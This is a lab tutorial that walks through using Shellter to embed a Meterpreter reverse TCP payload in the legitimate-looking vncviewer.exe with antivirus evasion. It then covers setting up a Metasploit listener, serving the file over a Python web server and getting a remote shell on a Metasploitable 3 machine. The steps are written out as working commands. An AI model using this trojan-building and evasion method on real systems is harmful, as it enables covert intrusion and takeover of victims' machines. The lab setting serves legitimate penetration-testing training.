Creating Custom Payloads with Shellter

This guide provides a step-by-step walkthrough of creating custom payloads using Shellter in Automated mode. It focuses on embedding Metasploit-generated payloads into legitimate Windows executables, enabling penetration testers to craft stealthy and effective payloads. By following this guide, users will learn how to configure Shellter's Automated mode to streamline payload creation while maintaining antivirus evasion.

Mahran Al-Zyoud
|
36 steps

Kali

Virtualbox

**Shellter** is a dynamic shellcode injection tool designed for Windows executables, offering a powerful method for embedding malicious payloads while maintaining the integrity of the host application. Unlike traditional injection techniques, Shellter leverages runtime analysis to identify suitable locations within an executable to inject shellcode. This ensures the application's normal functionality is preserved, making the payload less detectable by security solutions. A key feature of Shellter is its **Automated mode**, which simplifies the injection process by guiding users through essential steps without requiring in-depth knowledge of the executable’s internals. By automating the selection of injection points and payload integration, Shellter significantly reduces the time and effort needed to create functional, obfuscated payloads. This makes it an invaluable tool for penetration testers aiming to assess the resilience of antivirus software and intrusion detection systems in a controlled and ethical environment.

Power on the Kali Linux virtual machine and log in to the desktop. \ Next, open the Terminal (#1) and use the following commands (Steps 1 and 2) to install **Shellter**: [[sudo apt update]]

Run [[sudo apt install shellter]]

Use the following commands to set up and configure the working environment for Shellter and install Wine32: [[sudo dpkg --add-architecture i386]]

Run [[sudo apt update]] again.

Run [[sudo apt install wine32]]

Use the following commands to list a set of common Windows binaries on Kali Linux: [[ls -l /usr/share/windows-binaries/]] There are Windows-based binaries that can be useful for us.

Next, let’s use the following commands to copy the vncviewer.exe file to our current working directory, as it’s perceived as a harmless file: [[cp /usr/share/windows-binaries/vncviewer.exe /home/kali]]

Since we’ve installed additional packages onto Kali Linux during the previous steps, consider **log**ging **off** and **re-log**ging in to ensure the latest packages are applied.

Use the following command to launch the Shellter application on Kali Linux: [[sudo shellter]]

Next, when the Shellter window appears, you will be provided with the option to use Shellter in automatic or manual mode – type **A** and hit [[Enter ]]to apply automatic mode. In **automatic mode**, Shellter dynamically analyzes the **Portable Executable (PE)**\ file to identify a suitable injection point, whereas manual mode offers more control to the user. Next, Shellter will require a [**PE**](https://learn.microsoft.com/en-us/windows/win32/debug/pe-format) file. Specify the **vncviewer.exe** file within the **/home/kali** directory.

Shellter will determine where it can inject shellcode within the PE file. Once this process is completed, type **Y** and hit [[Enter ]]to enable stealth mode.

Next, configure the payload to be attached to the PE file and use the following configurations: - Choose **L** for the listed payload. - Payload by index: **1** (Meterpreter_Reverse_TCP). - Set **LHOST** as the IP address of your Kali Linux machine. - Set **LPORT** as the listening port on Kali Linux.

Once the custom payload has been successfully compiled, the following window will appear:

Next, go to <https://www.virustotal.com/> and upload the encoded vncviewer.exe file to determine its threat rating. As shown below, the threat detection rating is lower than those payloads that were generated by MSFvenom.

Next, use the following commands to set up a Meterpreter listener using Metasploit to capture the reverse shell from the targeted system when it is executed: [[ msfconsole]]

[[use exploit/multi/handler]] This command sets up a **multi/handler**, a versatile tool used to manage payloads. The **exploit/multi/handler** module is used to listen for and handle incoming connections from compromised systems (or targets) where a payload has been executed. It essentially acts as a listener or handler for reverse shells, bind shells, or other payloads. [[set payload windows/meterpreter/reverse_tcp]] The **windows/meterpreter/reverse_tcp** payload ensures that, when a connection is detected, Metasploit will send this payload to the targeted system, which will execute within memory and create a reverse shell back to the Kali Linux machine.

[[set LHOST 192.168.168.22]] [[set LPORT 5678]] The **LHOST** and **LPORT** parameters are used to set the local IP address and listening port on Kali Linux. [[set AutoRunScript post/windows/manage/]] This command ensures that, once a connection has been established from the victim system to Kali Linux, Metasploit will automatically migrate the process on the targeted system to another process to reduce detection. [[exploit]] This command is used to execute a payload or exploit module within Metasploit.

Next, let’s deliver our custom payload to a Windows-based machine such as Metasploitable 3. On Kali Linux, open a new **Terminal** (#2) and use the following commands to start a Python3 web server: [[python3 -m http.server 8000]] The Python3 web server will enable us to download files from the Kali Linux machine onto other systems within our lab environment.

Next, power on the Metasploitable 3 virtual machine and log in with the username\ **Administrator** and the password **vagrant** to log in to the desktop.

Within Metasploitable 3, open the web browser and go to http://<KALI_IP_ADDRESS>:8000 to download vncviewer.exe and save the payload.

Next, execute the vncviewer.exe file on Metasploitable 3 and you can see that the reverse shell is captured on Terminal **#1** on Kali Linux, as shown here:

As shown below, the Metasploit listener module captured a reverse connection from 192.168.168.24, then delivered an additional payload to establish a Meterpreter shell and migrate the running process ID on the victim system.

Once a Meterpreter shell has been obtained, use the [[help ]]command to view a\ list of commands for performing actions and collecting information from the\ compromised machine. Not all Windows-based executables will work with Shellter. When working with Shellter, it is important to ensure the PE file that is encoded with shellcode from Shellter executes long enough on the targeted system for the staged payload to be delivered from Kali Linux to the target. Keep in mind that executables that are heavily protected or use non-standard PE structures might pose challenges.

Using the [[sysinfo ]]command on Meterpreter enables us to obtain system information about the compromised system. Using the [[getuid ]]command within Meterpreter will determine the user account that’s running our payload. As shown below, the payload is running as the Administrator user account on the targeted system.